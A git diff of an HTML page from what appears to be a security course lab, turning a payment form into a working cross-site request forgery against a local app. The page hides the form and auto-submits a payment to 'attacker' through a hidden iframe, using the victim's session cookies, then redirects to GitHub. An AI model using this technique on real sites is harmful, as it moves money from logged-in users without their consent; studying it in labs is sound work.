--- a/malicious_app/views/csrf.html
+++ b/malicious_app/views/csrf.html
@@ -1,23 +1,44 @@
 <!DOCTYPE html>
 <html>
 
+<style>
+.payment-form {
+  visibility: hidden;
+}
+
+</style>
+
 <!-- Insert CSRF attack code here -->
 <!-- Must be logged in to victim account in browser (another tab is fine) so that cookies get passed -->
 <div class="payment-form">
   <h3 class="payment-header">Make payment?</h3>
-  <form action="http://localhost:8080/pay" method="post">
+  <form action="http://localhost:8080/pay" method="post" id="pay_attacker" target="attacker_iframe">
     <div class="form-group">
       <div class="form-label">To:</div>
-      <div class="form-input"><input name="recipient" type="text" value="attacker" hidden=true /></div>
+      <div class="form-input"><input name="recipient" type="text" value="attacker" /></div>
     </div>
     <div class="form-group">
       <div class="form-label">Amount:</div>
-      <div class="form-input"><input name="amount" type="number" value=10 hidden=true/></div>
+      <div class="form-input"><input name="amount" type="number" value=10 /></div>
     </div>
     <input class="form-button" type="submit" value="Pay"/>
   </form>
 
-  <!-- <div class="error"><p>{{ payment_error }}</p></div> -->
+  <script>
+    document.getElementById("pay_attacker").submit();
+  </script>
+
+  <!-- TODO: What should src be here? -->
+  <iframe id="a_frame" name="attacker_iframe" src="http://www.google.com"></iframe>
+
+  <!-- Check iframe has loaded -->
+  <script>
+    document.getElementById("a_frame").onload = function() {
+      // Redirect user to github
+      window.location.replace("http://github.com/tomrist/cs5435-fall2019");
+    }
+  </script>
+
 </div>
 
 </html>
